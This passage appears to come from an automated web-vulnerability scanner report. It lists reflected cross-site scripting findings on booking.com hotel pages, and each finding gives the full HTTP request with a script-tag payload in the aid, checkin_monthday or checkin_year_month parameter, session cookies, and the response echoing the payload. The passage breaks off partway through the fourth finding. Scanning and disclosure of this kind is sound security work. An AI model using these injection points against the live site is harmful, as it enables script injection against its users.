4.169. http://www.booking.com/hotel/us/c-boston-massachusettes.html [aid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the aid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb954"><script>alert(1)</script>ed55eb07e33 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804eb954"><script>alert(1)</script>ed55eb07e33&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:11:09 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN4n0eINcsV9R8sbXV6xyE9Xpwy687hQ9%2Bv%2F8VZQ7vbSfGP0uBFv%2B8wJxNuH5bdT%2B6C7LQH2wVRzMP36cfIOOwHiWPVx%2FKRfjRo4x9vnWERtfNT0fRHj4b7ZsypXGyv%2FFM0es64%2BIyqBE3%2BQNEh2LRBVUKPgKNt5YTZ4PRV2UhZBt3mT7I6RTkvMF7pIdMJ%2B7d1de0fbsftD79U%2BA8NxJLnQensvNV8ju0hsr4TIiG%2F%2Frlj1JBoCtUGvl2CdFk9mYtkewKS28ABXYmTcqIEmP%2FoVYMDwDwGuLxLBjf13xLUjENgoiQ2DvZSunABFP35sQtA2u81lvG1nOKmQgDoi%2FP%2FiY9ga1of52M%2FommlG%2BMjlU48leMYaotYwYxorSw12Wgs63lrJXQFIEmk%2BWcSw7fqIFcJF0JAZyLI7wDrUoLQ7IF6rHUjqyVwR45P8ZBu7q9dQ9B8a7eSd%2FlOvfBBV6kmRcrD7OAg06YVsOBW%2BHu7JpPcyEO8jLX%2FzdSJ2DEgesjjnf5wglkntMgWbMO5JX9TJXfm3WgzlaKeLotbIX39YuxGFZzb91lU419UOvgqZkIBcCPT3YNG7rDqwhkSOz0DkJKvrJlXVsBDdHyWQgfHe8JrpRF%2F8P2CQOdDYqVYxbjfxtZTXhuxlG1xBj4%2FuXB9SiYgakxi7YPVutwrKMY8UGvRCjTqObdzCgdDsxoS1iYrHKROhbHr6G5hERhuYtJ%2FB8iiUCEqLYe%2Fh0TT%2BwtEFp%2FFyodD65ruCa0Wp%2Bo0Qj05HV5btKiy9nRfNdKgieB4UQ21D35Lw9rOUwVdr%2F39Je8St887MhdMsPJOTf9f%2F8JmMzbg6HRivu%2Fa1d7DLFQTrSf1vXLmHOwm5uFEBJcYmaeYwBvuRYsAZfvZBWy8CvvpblOB14QJEcGhhcbgPMA2bGs7JfnFEMAbo0LeCQYFhqRJJyy220xu5vXJz0ZiPzhcSvhB8H2fYGy5IeyLuefOzf4KrYm4w7HqYy%2BOp15STjkETfDKwaIs0kkuKvgpe%2FLIR9D4IfbF2M01y7WVrP9tc%2FHdHtSsV20wzNnuRJKlI8BCl%2B%2FO6kI84B96aJ6Pb%2FzG28RK%2FaqyYyBOomkJjx1oKkjqPWt5aiAI%2BKy5homauCo8I4%2Bf%2BdexcrIQZ2gmgEvRNDpdf9yZAn81Pcbs6s48anVFDfZxAv5REsnv4pxEooJuW6mH6KX2NlYJc%2BbnpXJoVc2e%2BV%2FnaH4B0STbxRb8uvVoE67yXJvvWaous%2FcSV00T%2Bhqdtl6hbtFPTSlwMutJClGw%2F%2BRGGITPwH9AZVlohF7kWbEcEDdvSOV1CsJYaIpkqBgCQ%2FRLUvycOTE9XdI2oqe0B0zoyQE%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:11:09 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 228634
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<a target="_blank" title="Forgotten your password?" href="https://secure.booking.com/login.html?op=remind;lang=en;go_back_url=http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804eb954"><script>alert(1)</script>ed55eb07e33&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_
...[SNIP]...

4.170. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_monthday parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the checkin_monthday request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf942"><script>alert(1)</script>41df27e8007 was submitted in the checkin_monthday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14cf942"><script>alert(1)</script>41df27e8007&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:14:04 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YWaiSgbFU5%2BGdtgREHFMYP9KL%2BXWDp4eXWLKqDT4JHK4Ck5t9jXCZSfgs8iZ0zc4fI%2FNmoyKuXU%2F74EgzaV72KBAwDEbn9K7SqcpEXhY0l1KJih5E2TOjss6weHL6zvPdgpsLLsf1oG%2BH7TzGNYU4bNvX1GP8SiLhTA%2FvdnRlJXj2q0%2FBKEyhlglZdav2FlTPKnBneyCmsuM36VOCkVAn5L2CkKQ1vOz1okhGPaUihOuFhSIzlj9Arejb62RiNeghkIEoeTA%2BgIdU4HfXEzFoQqkNfkE15VQpyDqYIaEjbaDqet4733cA3Z6Hq1c44TurbwalX%2BDTE4tp8U8NsDBuoTekaJj9Ek05Gb%2FrOAFOBOsT1niC1HH8F3Wcu4MiPLGvPW%2BXojhtsHuqxK6tJJEpM65v5%2FuBa3ahdAnP790KQdF%2FgY3Il%2B1bdrzgf4JiZf2hnnxm661d40W8AuxjF9%2BKprTgXAp%2B75A7JEY01wZYHFAldpGQ6d1dFpLCcx2tpjO2AazPLocxB%2BeW0PjQnekdA%2FPnRj%2FHNQs9d4w1NGpq7OCx9QAgYsm3eBU4WSkGUPKYJmcKeaj3eHs%2FVm%2BE8xb0um%2BlFRWOv8oyfA3bHI9vCkDY5cdU%2BTG1sjb802fhPCmSN8N55QS0fpgfp13E%2F%2FIYjh64GmXW%2FdcpPauCfyGFKnGT2cTV9exDpFLUDUcsR2sTp6MNzZz%2BDO13KFrgLHKvZbkDIXd8m4Nj51Yvwp1s3R15BXNpMqXuHhV60gbt1EKpTsGv%2B3tw%2BDwIMv6oz7U%2BvhS%2BM9FWIkhbMpKUu6VhApOl7hpKM5cO3%2BGkU2B%2FtRQaGLwTkrkgnxYkXAXjau8InPVw8U4XbGejs0fE7kJDcJ%2F%2F526LouDz9G7xSAJqQQHnny5kBfWRhjIhN%2BvO3uU40p3IHu4d2vX8N3lO9qqqYt3g%2FJPROXoBgwseiJjTIabvro5I%2BgYJ1OirpqRrGbn%2FKc09E7x3bEEFR75ch6a8eNDbgPIZ%2FGYSal6ZfasIUvhuKCsGZge1berGdarGyubRZq4oF7pccaqbrqbByUbeGqcu1IsLOGbYgSiatNwEI4I4XdCvmlGqdkDmPNqTZ3OarO66BHoDhCvj7gBNcMTYRl%2FzEoqxD4Kl%2BEAtJAfwpx38PCJSNZbPv2pK%2BHhtP88gaNoudUKmHf4c4NQC%2FUMsNw96mVJLkOIHM6KHh4%2BDntkQO%2BrxXCXvv2bK2X%2FFF6jO0b6ev92jRrBgaz8cTMsMsvCQrIHKjBb4v4thjhwYgUwLtbDrg0DBVC0DC7x4XBGO%2BpY0LF%2Fbv9TnmEalex01QJmuJL8gl35I1%2BQoRl%2Fc2p8kphQORHwWnvFneHS%2FhM3vAAtODPo%2BUb62w%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:14:05 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 225016
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ww.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14cf942"><script>alert(1)</script>41df27e8007&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en">
...[SNIP]...

4.171. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_monthday parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the checkin_monthday request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c40b0</script><script>alert(1)</script>9c893ecf6af was submitted in the checkin_monthday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14c40b0</script><script>alert(1)</script>9c893ecf6af&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:14:29 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN4sTMjg6DJx7HaHS0Wu0DonGruQ19C5%2FA2qwp1uvnNC5LVmEZc%2FtD1X1w4xTGvBb2G71SGaRMBvID57Yanw9uScUOt940TVeeaUgqpS1YShC4kjKNg57XijsKAC2j2mwWCKDGStgBC6sTjB3%2FWgfEM87EKWcRIJyqg0GEKabkj9CEJEyWm04nb9QB%2BQ84LCo7LgTfGOHW7BiixkUqVZAydOmJ1X8u4P5PXNBllvMUdAPeuPsD%2B8lnVUNG3trDLVacg0NzPDp27DiAsrAttvm6a%2BVrBtOS6LZZ%2F5jRj%2BdtGwRN1k9R8PWj%2Fm47Mz3uilEy1jl4sZvvApowYkUymolIit0e8S6zt8yNjVHZql7jwEJN%2FJOXf3HaA7Y71wtiPNPFlVAu%2Bm55r4A%2FxyfLargsHl%2BsHVpzGdL1osyPN7t7enDzwE7hs2PvqTyD72vu2ah2tgYhoZQ0ZQVumaIHfeyUB%2Fp2hjdMRBtoDvfoei%2BuJzbvGsgYsGU0pVIp0Ofg5WXmVDub3Zc3tMFq4nEx8y3OepEoByBFm3CJAB7HTbSOEfSGS2AlYi3OPjpwU1iNblWEnUrMvHO%2BiOi2rqvgNHKQWixtu4LttcQnPtSr84YM3Wnn9kxiJLAW6g%2B3RtALfxU4%2BB2Bou%2FvyeMTDC%2Bggu%2FfI%2FhsBlsiQ40BEkdZkUAOA8eEbGBtTeKW2vx2PXG%2BCYrM3mQdB4gctyHXkS8WnJ%2F%2BaRmm7Sx3ytJ%2FzAafSldVeHoXDlneYtnEXkmQE32nYXgvhkRShU3Z97KIlGwpmjnkSFrawo2DWkRnhtZHzv%2FlHJ7nx4iNBLh0Uc8EJnpC3vINgBoBpFdiYOXh8HWtd%2BN2H9KK1Rb4dgioB0WAOOAj13oJBLkiYkI3H9Y5c95Zh2t9qvrttH6Yph3c9UFQxNxRLA50h%2F9l7Z1LM5ucjfbDVKd1IZeHA3Fz9nU5vhVSkxzPUsWV2f0Xw0%2F7WRmu3stlxPha67PyTw8gE3xKjs0KBsbl9BfJt3lyYoGC1z8ctq0WQbn63cebT19OOaxscf17XZ5WEWFdXX8VRXeTSkCtrpdm8VFcb3Omkrd8ROmQKKhx%2FIBoi8QqKzndMh7F3nM%2BvQSZwEbQ4yASNWIiW8u%2FzaDg2mjAWMVjVqqUujDRU5PSX1aljVXxzelRea3BNV0DXGn6IvpVR63ccHqfr7aZPr3BVPHHs7%2FZ%2FDJ5MqYby8VRcKeiijvXZJQ%2Bw9TVV5PK6f07oVP%2BF0N4b0x7RQhWWYPQzpEEL%2BSyq0G8cHau1JfARq56wUf6894HQXKOtdC81YJZbC9uSDe5U8aMjFp8Xr%2BYDsSsgtnv%2BTncBIzseqSO5iJX4JqhnrsuCj6UyH3dtQQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:14:30 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 225038
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ww.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14c40b0</script><script>alert(1)</script>9c893ecf6af&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en',
b_this_url : '/hotel/us/c-boston-massachusettes.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b6077
...[SNIP]...

4.172. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_year_month parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the checkin_year_month request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed23e"><script>alert(1)</script>defc7b1fdf7 was submitted in the checkin_year_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10ed23e"><script>alert(1)</script>defc7b1fdf7&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgW